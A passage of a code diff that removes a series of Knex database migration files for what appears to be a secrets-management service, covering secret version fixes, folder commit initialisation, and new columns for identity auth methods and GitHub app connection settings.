if (secretsToUpdate.length > 0) {
|
||||
const updateBatches = chunkArray(secretsToUpdate, 1000);
|
||||
|
||||
for (const updateBatch of updateBatches) {
|
||||
const ids = updateBatch.map((u) => u.id);
|
||||
const versionCases = updateBatch.map((u) => `WHEN '${u.id}' THEN ${u.newVersion}`).join(" ");
|
||||
|
||||
await knex.raw(
|
||||
`
|
||||
UPDATE ${TableName.SecretV2}
|
||||
SET version = CASE id ${versionCases} END,
|
||||
"updatedAt" = NOW()
|
||||
WHERE id IN (${ids.map(() => "?").join(",")})
|
||||
`,
|
||||
ids
|
||||
);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
logger.info("Secret version fix migration completed");
|
||||
}
|
||||
|
||||
export async function down(): Promise<void> {
|
||||
logger.info("Rollback not implemented for secret version fix migration");
|
||||
// Note: Rolling back this migration would be complex and potentially destructive
|
||||
// as it would require tracking which version entries were added
|
||||
}
|
@ -1,345 +0,0 @@
|
||||
import { Knex } from "knex";
|
||||
|
||||
import { chunkArray } from "@app/lib/fn";
|
||||
import { selectAllTableCols } from "@app/lib/knex";
|
||||
import { logger } from "@app/lib/logger";
|
||||
import { ActorType } from "@app/services/auth/auth-type";
|
||||
import { ChangeType } from "@app/services/folder-commit/folder-commit-service";
|
||||
|
||||
import {
|
||||
ProjectType,
|
||||
SecretType,
|
||||
TableName,
|
||||
TFolderCheckpoints,
|
||||
TFolderCommits,
|
||||
TFolderTreeCheckpoints,
|
||||
TSecretFolders
|
||||
} from "../schemas";
|
||||
|
||||
const sortFoldersByHierarchy = (folders: TSecretFolders[]) => {
|
||||
// Create a map for quick lookup of children by parent ID
|
||||
const childrenMap = new Map<string, TSecretFolders[]>();
|
||||
|
||||
// Set of all folder IDs
|
||||
const allFolderIds = new Set<string>();
|
||||
|
||||
// Build the set of all folder IDs
|
||||
folders.forEach((folder) => {
|
||||
if (folder.id) {
|
||||
allFolderIds.add(folder.id);
|
||||
}
|
||||
});
|
||||
|
||||
// Group folders by their parentId
|
||||
folders.forEach((folder) => {
|
||||
if (folder.parentId) {
|
||||
const children = childrenMap.get(folder.parentId) || [];
|
||||
children.push(folder);
|
||||
childrenMap.set(folder.parentId, children);
|
||||
}
|
||||
});
|
||||
|
||||
// Find root folders - those with no parentId or with a parentId that doesn't exist
|
||||
const rootFolders = folders.filter((folder) => !folder.parentId || !allFolderIds.has(folder.parentId));
|
||||
|
||||
// Process each level of the hierarchy
|
||||
const result = [];
|
||||
let currentLevel = rootFolders;
|
||||
|
||||
while (currentLevel.length > 0) {
|
||||
result.push(...currentLevel);
|
||||
|
||||
const nextLevel = [];
|
||||
for (const folder of currentLevel) {
|
||||
if (folder.id) {
|
||||
const children = childrenMap.get(folder.id) || [];
|
||||
nextLevel.push(...children);
|
||||
}
|
||||
}
|
||||
|
||||
currentLevel = nextLevel;
|
||||
}
|
||||
|
||||
return result.reverse();
|
||||
};
|
||||
|
||||
const getSecretsByFolderIds = async (knex: Knex, folderIds: string[]): Promise<Record<string, string[]>> => {
|
||||
const secrets = await knex(TableName.SecretV2)
|
||||
.whereIn(`${TableName.SecretV2}.folderId`, folderIds)
|
||||
.where(`${TableName.SecretV2}.type`, SecretType.Shared)
|
||||
.join<TableName.SecretVersionV2>(TableName.SecretVersionV2, (queryBuilder) => {
|
||||
void queryBuilder
|
||||
.on(`${TableName.SecretVersionV2}.secretId`, `${TableName.SecretV2}.id`)
|
||||
.andOn(`${TableName.SecretVersionV2}.version`, `${TableName.SecretV2}.version`);
|
||||
})
|
||||
.select(selectAllTableCols(TableName.SecretV2))
|
||||
.select(knex.ref("id").withSchema(TableName.SecretVersionV2).as("secretVersionId"));
|
||||
|
||||
const secretsMap: Record<string, string[]> = {};
|
||||
|
||||
secrets.forEach((secret) => {
|
||||
if (!secretsMap[secret.folderId]) {
|
||||
secretsMap[secret.folderId] = [];
|
||||
}
|
||||
secretsMap[secret.folderId].push(secret.secretVersionId);
|
||||
});
|
||||
|
||||
return secretsMap;
|
||||
};
|
||||
|
||||
const getFoldersByParentIds = async (knex: Knex, parentIds: string[]): Promise<Record<string, string[]>> => {
|
||||
const folders = await knex(TableName.SecretFolder)
|
||||
.whereIn(`${TableName.SecretFolder}.parentId`, parentIds)
|
||||
.where(`${TableName.SecretFolder}.isReserved`, false)
|
||||
.join<TableName.SecretFolderVersion>(TableName.SecretFolderVersion, (queryBuilder) => {
|
||||
void queryBuilder
|
||||
.on(`${TableName.SecretFolderVersion}.folderId`, `${TableName.SecretFolder}.id`)
|
||||
.andOn(`${TableName.SecretFolderVersion}.version`, `${TableName.SecretFolder}.version`);
|
||||
})
|
||||
.select(selectAllTableCols(TableName.SecretFolder))
|
||||
.select(knex.ref("id").withSchema(TableName.SecretFolderVersion).as("folderVersionId"));
|
||||
|
||||
const foldersMap: Record<string, string[]> = {};
|
||||
|
||||
folders.forEach((folder) => {
|
||||
if (!folder.parentId) {
|
||||
return;
|
||||
}
|
||||
if (!foldersMap[folder.parentId]) {
|
||||
foldersMap[folder.parentId] = [];
|
||||
}
|
||||
foldersMap[folder.parentId].push(folder.folderVersionId);
|
||||
});
|
||||
|
||||
return foldersMap;
|
||||
};
|
||||
|
||||
export async function up(knex: Knex): Promise<void> {
|
||||
logger.info("Initializing folder commits");
|
||||
const hasFolderCommitTable = await knex.schema.hasTable(TableName.FolderCommit);
|
||||
if (hasFolderCommitTable) {
|
||||
// Get Projects to Initialize
|
||||
const projects = await knex(TableName.Project)
|
||||
.where(`${TableName.Project}.version`, 3)
|
||||
.where(`${TableName.Project}.type`, ProjectType.SecretManager)
|
||||
.select(selectAllTableCols(TableName.Project));
|
||||
logger.info(`Found ${projects.length} projects to initialize`);
|
||||
|
||||
// Process Projects in batches of 100
|
||||
const batches = chunkArray(projects, 100);
|
||||
let i = 0;
|
||||
for (const batch of batches) {
|
||||
i += 1;
|
||||
logger.info(`Processing project batch ${i} of ${batches.length}`);
|
||||
let foldersCommitsList = [];
|
||||
|
||||
const rootFoldersMap: Record<string, string> = {};
|
||||
const envRootFoldersMap: Record<string, string> = {};
|
||||
|
||||
// Get All Folders for the Project
|
||||
// eslint-disable-next-line no-await-in-loop
|
||||
const folders = await knex(TableName.SecretFolder)
|
||||
.join(TableName.Environment, `${TableName.SecretFolder}.envId`, `${TableName.Environment}.id`)
|
||||
.whereIn(
|
||||
`${TableName.Environment}.projectId`,
|
||||
batch.map((project) => project.id)
|
||||
)
|
||||
.where(`${TableName.SecretFolder}.isReserved`, false)
|
||||
.select(selectAllTableCols(TableName.SecretFolder));
|
||||
logger.info(`Found ${folders.length} folders to initialize in project batch ${i} of ${batches.length}`);
|
||||
|
||||
// Sort Folders by Hierarchy (parents before nested folders)
|
||||
const sortedFolders = sortFoldersByHierarchy(folders);
|
||||
|
||||
// eslint-disable-next-line no-await-in-loop
|
||||
const folderSecretsMap = await getSecretsByFolderIds(
|
||||
knex,
|
||||
sortedFolders.map((folder) => folder.id)
|
||||
);
|
||||
// eslint-disable-next-line no-await-in-loop
|
||||
const folderFoldersMap = await getFoldersByParentIds(
|
||||
knex,
|
||||
sortedFolders.map((folder) => folder.id)
|
||||
);
|
||||
|
||||
// Get folder commit changes
|
||||
for (const folder of sortedFolders) {
|
||||
const subFolderVersionIds = folderFoldersMap[folder.id];
|
||||
const secretVersionIds = folderSecretsMap[folder.id];
|
||||
const changes = [];
|
||||
if (subFolderVersionIds) {
|
||||
changes.push(
|
||||
...subFolderVersionIds.map((folderVersionId) => ({
|
||||
folderId: folder.id,
|
||||
changeType: ChangeType.ADD,
|
||||
secretVersionId: undefined,
|
||||
folderVersionId,
|
||||
isUpdate: false
|
||||
}))
|
||||
);
|
||||
}
|
||||
if (secretVersionIds) {
|
||||
changes.push(
|
||||
...secretVersionIds.map((secretVersionId) => ({
|
||||
folderId: folder.id,
|
||||
changeType: ChangeType.ADD,
|
||||
secretVersionId,
|
||||
folderVersionId: undefined,
|
||||
isUpdate: false
|
||||
}))
|
||||
);
|
||||
}
|
||||
if (changes.length > 0) {
|
||||
const folderCommit = {
|
||||
commit: {
|
||||
actorMetadata: {},
|
||||
actorType: ActorType.PLATFORM,
|
||||
message: "Initialized folder",
|
||||
folderId: folder.id,
|
||||
envId: folder.envId
|
||||
},
|
||||
changes
|
||||
};
|
||||
foldersCommitsList.push(folderCommit);
|
||||
if (!folder.parentId) {
|
||||
rootFoldersMap[folder.id] = folder.envId;
|
||||
envRootFoldersMap[folder.envId] = folder.id;
|
||||
}
|
||||
}
|
||||
}
|
||||
logger.info(`Retrieved folder changes for project batch ${i} of ${batches.length}`);
|
||||
|
||||
const filteredBrokenProjectFolders: string[] = [];
|
||||
|
||||
foldersCommitsList = foldersCommitsList.filter((folderCommit) => {
|
||||
if (!envRootFoldersMap[folderCommit.commit.envId]) {
|
||||
filteredBrokenProjectFolders.push(folderCommit.commit.folderId);
|
||||
return false;
|
||||
}
|
||||
return true;
|
||||
});
|
||||
|
||||
logger.info(
|
||||
`Filtered ${filteredBrokenProjectFolders.length} broken project folders: ${JSON.stringify(filteredBrokenProjectFolders)}`
|
||||
);
|
||||
|
||||
// Insert New Commits in batches of 9000
|
||||
const newCommits = foldersCommitsList.map((folderCommit) => folderCommit.commit);
|
||||
const commitBatches = chunkArray(newCommits, 9000);
|
||||
|
||||
let j = 0;
|
||||
for (const commitBatch of commitBatches) {
|
||||
j += 1;
|
||||
logger.info(`Inserting folder commits - batch ${j} of ${commitBatches.length}`);
|
||||
// Create folder commit
|
||||
// eslint-disable-next-line no-await-in-loop
|
||||
const newCommitsInserted = (await knex
|
||||
.batchInsert(TableName.FolderCommit, commitBatch)
|
||||
.returning("*")) as TFolderCommits[];
|
||||
|
||||
logger.info(`Finished inserting folder commits - batch ${j} of ${commitBatches.length}`);
|
||||
|
||||
const newCommitsMap: Record<string, string> = {};
|
||||
const newCommitsMapInverted: Record<string, string> = {};
|
||||
const newCheckpointsMap: Record<string, string> = {};
|
||||
newCommitsInserted.forEach((commit) => {
|
||||
newCommitsMap[commit.folderId] = commit.id;
|
||||
newCommitsMapInverted[commit.id] = commit.folderId;
|
||||
});
|
||||
|
||||
// Create folder checkpoints
|
||||
// eslint-disable-next-line no-await-in-loop
|
||||
const newCheckpoints = (await knex
|
||||
.batchInsert(
|
||||
TableName.FolderCheckpoint,
|
||||
Object.values(newCommitsMap).map((commitId) => ({
|
||||
folderCommitId: commitId
|
||||
}))
|
||||
)
|
||||
.returning("*")) as TFolderCheckpoints[];
|
||||
|
||||
logger.info(`Finished inserting folder checkpoints - batch ${j} of ${commitBatches.length}`);
|
||||
|
||||
newCheckpoints.forEach((checkpoint) => {
|
||||
newCheckpointsMap[newCommitsMapInverted[checkpoint.folderCommitId]] = checkpoint.id;
|
||||
});
|
||||
|
||||
// Create folder commit changes
|
||||
// eslint-disable-next-line no-await-in-loop
|
||||
await knex.batchInsert(
|
||||
TableName.FolderCommitChanges,
|
||||
foldersCommitsList
|
||||
.map((folderCommit) => folderCommit.changes)
|
||||
.flat()
|
||||
.map((change) => ({
|
||||
folderCommitId: newCommitsMap[change.folderId],
|
||||
changeType: change.changeType,
|
||||
secretVersionId: change.secretVersionId,
|
||||
folderVersionId: change.folderVersionId,
|
||||
isUpdate: false
|
||||
}))
|
||||
);
|
||||
|
||||
logger.info(`Finished inserting folder commit changes - batch ${j} of ${commitBatches.length}`);
|
||||
|
||||
// Create folder checkpoint resources
|
||||
// eslint-disable-next-line no-await-in-loop
|
||||
await knex.batchInsert(
|
||||
TableName.FolderCheckpointResources,
|
||||
foldersCommitsList
|
||||
.map((folderCommit) => folderCommit.changes)
|
||||
.flat()
|
||||
.map((change) => ({
|
||||
folderCheckpointId: newCheckpointsMap[change.folderId],
|
||||
folderVersionId: change.folderVersionId,
|
||||
secretVersionId: change.secretVersionId
|
||||
}))
|
||||
);
|
||||
|
||||
logger.info(`Finished inserting folder checkpoint resources - batch ${j} of ${commitBatches.length}`);
|
||||
|
||||
// Create Folder Tree Checkpoint
|
||||
// eslint-disable-next-line no-await-in-loop
|
||||
const newTreeCheckpoints = (await knex
|
||||
.batchInsert(
|
||||
TableName.FolderTreeCheckpoint,
|
||||
Object.keys(rootFoldersMap).map((folderId) => ({
|
||||
folderCommitId: newCommitsMap[folderId]
|
||||
}))
|
||||
)
|
||||
.returning("*")) as TFolderTreeCheckpoints[];
|
||||
|
||||
logger.info(`Finished inserting folder tree checkpoints - batch ${j} of ${commitBatches.length}`);
|
||||
|
||||
const newTreeCheckpointsMap: Record<string, string> = {};
|
||||
newTreeCheckpoints.forEach((checkpoint) => {
|
||||
newTreeCheckpointsMap[rootFoldersMap[newCommitsMapInverted[checkpoint.folderCommitId]]] = checkpoint.id;
|
||||
});
|
||||
|
||||
// Create Folder Tree Checkpoint Resources
|
||||
// eslint-disable-next-line no-await-in-loop
|
||||
await knex
|
||||
.batchInsert(
|
||||
TableName.FolderTreeCheckpointResources,
|
||||
newCommitsInserted.map((folderCommit) => ({
|
||||
folderTreeCheckpointId: newTreeCheckpointsMap[folderCommit.envId],
|
||||
folderId: folderCommit.folderId,
|
||||
folderCommitId: folderCommit.id
|
||||
}))
|
||||
)
|
||||
.returning("*");
|
||||
|
||||
logger.info(`Finished inserting folder tree checkpoint resources - batch ${j} of ${commitBatches.length}`);
|
||||
}
|
||||
}
|
||||
}
|
||||
logger.info("Folder commits initialized");
|
||||
}
|
||||
|
||||
export async function down(knex: Knex): Promise<void> {
|
||||
const hasFolderCommitTable = await knex.schema.hasTable(TableName.FolderCommit);
|
||||
if (hasFolderCommitTable) {
|
||||
// delete all existing entries
|
||||
await knex(TableName.FolderCommit).del();
|
||||
}
|
||||
}
|
@ -1,44 +0,0 @@
|
||||
import { Knex } from "knex";
|
||||
|
||||
import { TableName } from "../schemas";
|
||||
|
||||
export async function up(knex: Knex): Promise<void> {
|
||||
const hasStepColumn = await knex.schema.hasColumn(TableName.AccessApprovalPolicyApprover, "sequence");
|
||||
const hasApprovalRequiredColumn = await knex.schema.hasColumn(
|
||||
TableName.AccessApprovalPolicyApprover,
|
||||
"approvalsRequired"
|
||||
);
|
||||
if (!hasStepColumn || !hasApprovalRequiredColumn) {
|
||||
await knex.schema.alterTable(TableName.AccessApprovalPolicyApprover, (t) => {
|
||||
if (!hasStepColumn) t.integer("sequence").defaultTo(1);
|
||||
if (!hasApprovalRequiredColumn) t.integer("approvalsRequired").nullable();
|
||||
});
|
||||
}
|
||||
|
||||
// set rejected status for all access request that was rejected and still has status pending
|
||||
const subquery = knex(TableName.AccessApprovalRequest)
|
||||
.leftJoin(
|
||||
TableName.AccessApprovalRequestReviewer,
|
||||
`${TableName.AccessApprovalRequestReviewer}.requestId`,
|
||||
`${TableName.AccessApprovalRequest}.id`
|
||||
)
|
||||
.where(`${TableName.AccessApprovalRequest}.status` as "status", "pending")
|
||||
.where(`${TableName.AccessApprovalRequestReviewer}.status` as "status", "rejected")
|
||||
.select(`${TableName.AccessApprovalRequest}.id`);
|
||||
|
||||
await knex(TableName.AccessApprovalRequest).where("id", "in", subquery).update("status", "rejected");
|
||||
}
|
||||
|
||||
export async function down(knex: Knex): Promise<void> {
|
||||
const hasStepColumn = await knex.schema.hasColumn(TableName.AccessApprovalPolicyApprover, "sequence");
|
||||
const hasApprovalRequiredColumn = await knex.schema.hasColumn(
|
||||
TableName.AccessApprovalPolicyApprover,
|
||||
"approvalsRequired"
|
||||
);
|
||||
if (hasStepColumn || hasApprovalRequiredColumn) {
|
||||
await knex.schema.alterTable(TableName.AccessApprovalPolicyApprover, (t) => {
|
||||
if (hasStepColumn) t.dropColumn("sequence");
|
||||
if (hasApprovalRequiredColumn) t.dropColumn("approvalsRequired");
|
||||
});
|
||||
}
|
||||
}
|
@ -1,23 +0,0 @@
|
||||
import { Knex } from "knex";
|
||||
|
||||
import { TableName } from "../schemas";
|
||||
|
||||
export async function up(knex: Knex): Promise<void> {
|
||||
const hasTokenReviewModeColumn = await knex.schema.hasColumn(TableName.IdentityKubernetesAuth, "tokenReviewMode");
|
||||
|
||||
if (!hasTokenReviewModeColumn) {
|
||||
await knex.schema.alterTable(TableName.IdentityKubernetesAuth, (table) => {
|
||||
table.string("tokenReviewMode").notNullable().defaultTo("api");
|
||||
});
|
||||
}
|
||||
}
|
||||
|
||||
export async function down(knex: Knex): Promise<void> {
|
||||
const hasTokenReviewModeColumn = await knex.schema.hasColumn(TableName.IdentityKubernetesAuth, "tokenReviewMode");
|
||||
|
||||
if (hasTokenReviewModeColumn) {
|
||||
await knex.schema.alterTable(TableName.IdentityKubernetesAuth, (table) => {
|
||||
table.dropColumn("tokenReviewMode");
|
||||
});
|
||||
}
|
||||
}
|
@ -1,21 +0,0 @@
|
||||
import { Knex } from "knex";
|
||||
|
||||
import { TableName } from "../schemas";
|
||||
|
||||
export async function up(knex: Knex): Promise<void> {
|
||||
const hasShowSnapshotsLegacyColumn = await knex.schema.hasColumn(TableName.Project, "showSnapshotsLegacy");
|
||||
if (!hasShowSnapshotsLegacyColumn) {
|
||||
await knex.schema.table(TableName.Project, (table) => {
|
||||
table.boolean("showSnapshotsLegacy").notNullable().defaultTo(false);
|
||||
});
|
||||
}
|
||||
}
|
||||
|
||||
export async function down(knex: Knex): Promise<void> {
|
||||
const hasShowSnapshotsLegacyColumn = await knex.schema.hasColumn(TableName.Project, "showSnapshotsLegacy");
|
||||
if (hasShowSnapshotsLegacyColumn) {
|
||||
await knex.schema.table(TableName.Project, (table) => {
|
||||
table.dropColumn("showSnapshotsLegacy");
|
||||
});
|
||||
}
|
||||
}
|
@ -1,21 +0,0 @@
|
||||
import { Knex } from "knex";
|
||||
|
||||
import { TableName } from "../schemas";
|
||||
|
||||
export async function up(knex: Knex): Promise<void> {
|
||||
const hasConfigColumn = await knex.schema.hasColumn(TableName.DynamicSecretLease, "config");
|
||||
if (!hasConfigColumn) {
|
||||
await knex.schema.alterTable(TableName.DynamicSecretLease, (table) => {
|
||||
table.jsonb("config");
|
||||
});
|
||||
}
|
||||
}
|
||||
|
||||
export async function down(knex: Knex): Promise<void> {
|
||||
const hasConfigColumn = await knex.schema.hasColumn(TableName.DynamicSecretLease, "config");
|
||||
if (hasConfigColumn) {
|
||||
await knex.schema.alterTable(TableName.DynamicSecretLease, (table) => {
|
||||
table.dropColumn("config");
|
||||
});
|
||||
}
|
||||
}
|
@ -1,45 +0,0 @@
|
||||
import { Knex } from "knex";
|
||||
|
||||
import { selectAllTableCols } from "@app/lib/knex";
|
||||
|
||||
import { TableName } from "../schemas";
|
||||
|
||||
const BATCH_SIZE = 1000;
|
||||
|
||||
export async function up(knex: Knex): Promise<void> {
|
||||
const hasKubernetesHostColumn = await knex.schema.hasColumn(TableName.IdentityKubernetesAuth, "kubernetesHost");
|
||||
|
||||
if (hasKubernetesHostColumn) {
|
||||
await knex.schema.alterTable(TableName.IdentityKubernetesAuth, (table) => {
|
||||
table.string("kubernetesHost").nullable().alter();
|
||||
});
|
||||
}
|
||||
}
|
||||
|
||||
export async function down(knex: Knex): Promise<void> {
|
||||
const hasKubernetesHostColumn = await knex.schema.hasColumn(TableName.IdentityKubernetesAuth, "kubernetesHost");
|
||||
|
||||
// find all rows where kubernetesHost is null
|
||||
const rows = await knex(TableName.IdentityKubernetesAuth)
|
||||
.whereNull("kubernetesHost")
|
||||
.select(selectAllTableCols(TableName.IdentityKubernetesAuth));
|
||||
|
||||
if (rows.length > 0) {
|
||||
for (let i = 0; i < rows.length; i += BATCH_SIZE) {
|
||||
const batch = rows.slice(i, i + BATCH_SIZE);
|
||||
// eslint-disable-next-line no-await-in-loop
|
||||
await knex(TableName.IdentityKubernetesAuth)
|
||||
.whereIn(
|
||||
"id",
|
||||
batch.map((row) => row.id)
|
||||
)
|
||||
.update({ kubernetesHost: "" });
|
||||
}
|
||||
}
|
||||
|
||||
if (hasKubernetesHostColumn) {
|
||||
await knex.schema.alterTable(TableName.IdentityKubernetesAuth, (table) => {
|
||||
table.string("kubernetesHost").notNullable().alter();
|
||||
});
|
||||
}
|
||||
}
|
@ -1,29 +0,0 @@
|
||||
import { Knex } from "knex";
|
||||
|
||||
import { TableName } from "../schemas";
|
||||
import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils";
|
||||
|
||||
export async function up(knex: Knex): Promise<void> {
|
||||
if (!(await knex.schema.hasTable(TableName.IdentityAliCloudAuth))) {
|
||||
await knex.schema.createTable(TableName.IdentityAliCloudAuth, (t) => {
|
||||
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
|
||||
t.bigInteger("accessTokenTTL").defaultTo(7200).notNullable();
|
||||
t.bigInteger("accessTokenMaxTTL").defaultTo(7200).notNullable();
|
||||
t.bigInteger("accessTokenNumUsesLimit").defaultTo(0).notNullable();
|
||||
t.jsonb("accessTokenTrustedIps").notNullable();
|
||||
t.timestamps(true, true, true);
|
||||
t.uuid("identityId").notNullable().unique();
|
||||
t.foreign("identityId").references("id").inTable(TableName.Identity).onDelete("CASCADE");
|
||||
t.string("type").notNullable();
|
||||
|
||||
t.string("allowedArns").notNullable();
|
||||
});
|
||||
}
|
||||
|
||||
await createOnUpdateTrigger(knex, TableName.IdentityAliCloudAuth);
|
||||
}
|
||||
|
||||
export async function down(knex: Knex): Promise<void> {
|
||||
await knex.schema.dropTableIfExists(TableName.IdentityAliCloudAuth);
|
||||
await dropOnUpdateTrigger(knex, TableName.IdentityAliCloudAuth);
|
||||
}
|
@ -1,21 +0,0 @@
|
||||
import { Knex } from "knex";
|
||||
|
||||
import { TableName } from "../schemas";
|
||||
|
||||
export async function up(knex: Knex): Promise<void> {
|
||||
const hasCol = await knex.schema.hasColumn(TableName.Identity, "hasDeleteProtection");
|
||||
if (!hasCol) {
|
||||
await knex.schema.alterTable(TableName.Identity, (t) => {
|
||||
t.boolean("hasDeleteProtection").notNullable().defaultTo(false);
|
||||
});
|
||||
}
|
||||
}
|
||||
|
||||
export async function down(knex: Knex): Promise<void> {
|
||||
const hasCol = await knex.schema.hasColumn(TableName.Identity, "hasDeleteProtection");
|
||||
if (hasCol) {
|
||||
await knex.schema.alterTable(TableName.Identity, (t) => {
|
||||
t.dropColumn("hasDeleteProtection");
|
||||
});
|
||||
}
|
||||
}
|
@ -1,21 +0,0 @@
|
||||
import { Knex } from "knex";
|
||||
|
||||
import { TableName } from "../schemas";
|
||||
|
||||
export async function up(knex: Knex): Promise<void> {
|
||||
const hasColumn = await knex.schema.hasColumn(TableName.IdentityAwsAuth, "allowedPrincipalArns");
|
||||
if (hasColumn) {
|
||||
await knex.schema.alterTable(TableName.IdentityAwsAuth, (t) => {
|
||||
t.string("allowedPrincipalArns", 2048).notNullable().alter();
|
||||
});
|
||||
}
|
||||
}
|
||||
|
||||
export async function down(knex: Knex): Promise<void> {
|
||||
const hasColumn = await knex.schema.hasColumn(TableName.IdentityAwsAuth, "allowedPrincipalArns");
|
||||
if (hasColumn) {
|
||||
await knex.schema.alterTable(TableName.IdentityAwsAuth, (t) => {
|
||||
t.string("allowedPrincipalArns", 255).notNullable().alter();
|
||||
});
|
||||
}
|
||||
}
|
@ -1,91 +0,0 @@
|
||||
import { Knex } from "knex";
|
||||
|
||||
import { TableName } from "../schemas";
|
||||
|
||||
export async function up(knex: Knex): Promise<void> {
|
||||
const hasEncryptedGithubAppConnectionClientIdColumn = await knex.schema.hasColumn(
|
||||
TableName.SuperAdmin,
|
||||
"encryptedGitHubAppConnectionClientId"
|
||||
);
|
||||
const hasEncryptedGithubAppConnectionClientSecretColumn = await knex.schema.hasColumn(
|
||||
TableName.SuperAdmin,
|
||||
"encryptedGitHubAppConnectionClientSecret"
|
||||
);
|
||||
|
||||
const hasEncryptedGithubAppConnectionSlugColumn = await knex.schema.hasColumn(
|
||||
TableName.SuperAdmin,
|
||||
"encryptedGitHubAppConnectionSlug"
|
||||
);
|
||||
|
||||
const hasEncryptedGithubAppConnectionAppIdColumn = await knex.schema.hasColumn(
|
||||
TableName.SuperAdmin,
|
||||
"encryptedGitHubAppConnectionId"
|
||||
);
|
||||
|
||||
const hasEncryptedGithubAppConnectionAppPrivateKeyColumn = await knex.schema.hasColumn(
|
||||
TableName.SuperAdmin,
|
||||
"encryptedGitHubAppConnectionPrivateKey"
|
||||
);
|
||||
|
||||
await knex.schema.alterTable(TableName.SuperAdmin, (t) => {
|
||||
if (!hasEncryptedGithubAppConnectionClientIdColumn) {
|
||||
t.binary("encryptedGitHubAppConnectionClientId").nullable();
|
||||
}
|
||||
if (!hasEncryptedGithubAppConnectionClientSecretColumn) {
|
||||
t.binary("encryptedGitHubAppConnectionClientSecret").nullable();
|
||||
}
|
||||
if (!hasEncryptedGithubAppConnectionSlugColumn) {
|
||||
t.binary("encryptedGitHubAppConnectionSlug").nullable();
|
||||
}
|
||||
if (!hasEncryptedGithubAppConnectionAppIdColumn) {
|
||||
t.binary("encryptedGitHubAppConnectionId").nullable();
|
||||
}
|
||||
if (!hasEncryptedGithubAppConnectionAppPrivateKeyColumn) {
|
||||
t.binary("encryptedGitHubAppConnectionPrivateKey").nullable();
|
||||
}
|
||||
});
|
||||
}
|
||||
|
||||
export async function down(knex: Knex): Promise<void> {
|
||||
const hasEncryptedGithubAppConnectionClientIdColumn = await knex.schema.hasColumn(
|
||||
TableName.SuperAdmin,
|
||||
"encryptedGitHubAppConnectionClientId"
|
||||
);
|
||||
const hasEncryptedGithubAppConnectionClientSecretColumn = await knex.schema.hasColumn(
|
||||
TableName.SuperAdmin,
|
||||
"encryptedGitHubAppConnectionClientSecret"
|
||||
);
|
||||
|
||||
const hasEncryptedGithubAppConnectionSlugColumn = await knex.schema.hasColumn(
|
||||
TableName.SuperAdmin,
|
||||
"encryptedGitHubAppConnectionSlug"
|
||||
);
|
||||
|
||||
const hasEncryptedGithubAppConnectionAppIdColumn = await knex.schema.hasColumn(
|
||||
TableName.SuperAdmin,
|
||||
"encryptedGitHubAppConnectionId"
|
||||
);
|
||||
|
||||
const hasEncryptedGithubAppConnectionAppPrivateKeyColumn = await knex.schema.hasColumn(
|
||||
TableName.SuperAdmin,
|
||||
"encryptedGitHubAppConnectionPrivateKey"
|
||||
);
|
||||
|
||||
await knex.schema.alterTable(TableName.SuperAdmin, (t) => {
|
||||
if (hasEncryptedGithubAppConnectionClientIdColumn) {
|
||||
t.dropColumn("encryptedGitHubAppConnectionClientId");
|
||||
}
|
||||
if (hasEncryptedGithubAppConnectionClientSecretColumn) {
|
||||
t.dropColumn("encryptedGitHubAppConnectionClientSecret");
|
||||
}
|
||||
if (hasEncryptedGithubAppConnectionSlugColumn) {
|
||||
t.dropColumn("encryptedGitHubAppConnectionSlug");
|
||||
}
|
||||
if (hasEncryptedGithubAppConnectionAppIdColumn) {
|
||||
t.dropColumn("encryptedGitHubAppConnectionId");
|
||||
}
|
||||
if (hasEncryptedGithubAppConnectionAppPrivateKeyColumn) {
|
||||
t.dropColumn("encryptedGitHubAppConnectionPrivateKey");
|
||||
}
|
||||
});
|
||||
}
|
@ -1,28 +0,0 @@
|
||||
import { Knex } from "knex";
|
||||
|
||||
import { TableName } from "../schemas";
|
||||
import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils";
|
||||
|
||||
export async function up(knex: Knex): Promise<void> {
|
||||
if (!(await knex.schema.hasTable(TableName.IdentityTlsCertAuth))) {
|
||||
await knex.schema.createTable(TableName.IdentityTlsCertAuth, (t) => {
|
||||
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
|
||||
t.bigInteger("accessTokenTTL").defaultTo(7200).notNullable();
|
||||
t.bigInteger("accessTokenMaxTTL").defaultTo(7200).notNullable();
|
||||
t.bigInteger("accessTokenNumUsesLimit").defaultTo(0).notNullable();
|
||||
t.jsonb("accessTokenTrustedIps").notNullable();
|
||||
t.timestamps(true, true, true);
|
||||
t.uuid("identityId").notNullable().unique();
|
||||
t.foreign("identityId").references("id").inTable(TableName.Identity).onDelete("CASCADE");
|
||||
t.string("allowedCommonNames").nullable();
|
||||
t.binary("encryptedCaCertificate").notNullable();
|
||||
});
|
||||
}
|
||||
|
||||
await createOnUpdateTrigger(knex, TableName.IdentityTlsCertAuth);
|
||||
}
|
||||
|
||||
export async function down(knex: Knex): Promise<void> {
|
||||
await knex.schema.dropTableIfExists(TableName.IdentityTlsCertAuth);
|
||||
await dropOnUpdateTrigger(knex, TableName.IdentityTlsCertAuth);
|
||||
}
|
@ -1,41 +0,0 @@
|
||||
import { Knex } from "knex";
|
||||
|
||||
import { ProjectType, TableName } from "../schemas";
|
||||
|
||||
export async function up(knex: Knex): Promise<void> {
|
||||
const hasTypeColumn = await knex.schema.hasColumn(TableName.Project, "type");
|
||||
const hasDefaultTypeColumn = await knex.schema.hasColumn(TableName.Project, "defaultProduct");
|
||||
if (hasTypeColumn && !hasDefaultTypeColumn) {
|
||||
await knex.schema.alterTable(TableName.Project, (t) => {
|
||||
t.string("type").nullable().alter();
|
||||
t.string("defaultProduct").notNullable().defaultTo(ProjectType.SecretManager);
|
||||
});
|
||||
|
||||
await knex(TableName.Project).update({
|
||||
// eslint-disable-next-line
|
||||
// @ts-ignore this is because this field is created later
|
||||
defaultProduct: knex.raw(`
|
||||
CASE
|
||||
WHEN "type" IS NULL OR "type" = '' THEN 'secret-manager'
|
||||
ELSE "type"
|
||||
END
|
||||
`)
|
||||
});
|
||||
}
|
||||
|
||||
const hasTemplateTypeColumn = await knex.schema.hasColumn(TableName.ProjectTemplates, "type");
|
||||
if (hasTemplateTypeColumn) {
|
||||
await knex.schema.alterTable(TableName.ProjectTemplates, (t) => {
|
||||
t.string("type").nullable().alter();
|
||||
});
|
||||
}
|
||||
}
|
||||
|
||||
export async function down(knex: Knex): Promise<void> {
|
||||
